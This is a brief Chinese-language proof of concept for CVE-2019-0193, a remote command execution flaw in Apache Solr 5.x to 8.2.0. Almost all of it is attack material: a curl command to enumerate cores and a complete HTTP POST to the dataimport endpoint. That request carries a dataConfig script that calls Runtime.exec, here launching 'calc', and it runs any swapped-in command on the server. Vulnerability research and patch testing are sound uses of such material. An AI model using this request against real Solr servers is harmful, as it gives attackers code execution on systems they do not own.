Apache Solr远程命令执行 CVE-2019-0193

影响版本 apache solr 5.x-8.2.0,存在config API版本 获取所有 core 信息:curl http://IP/solr/admin/cores HTTP协议头:POST /solr//dataimport

POC

POST /solr/<your_core_name>/dataimport HTTP/1.1
Host: 127.0.0.1:8983
Content-Length: 763
User-Agent: Mozilla/5.0
Content-type: application/x-www-form-urlencoded
Connection: close

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"></dataSource>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" ></entity>
</document>
</dataConfig>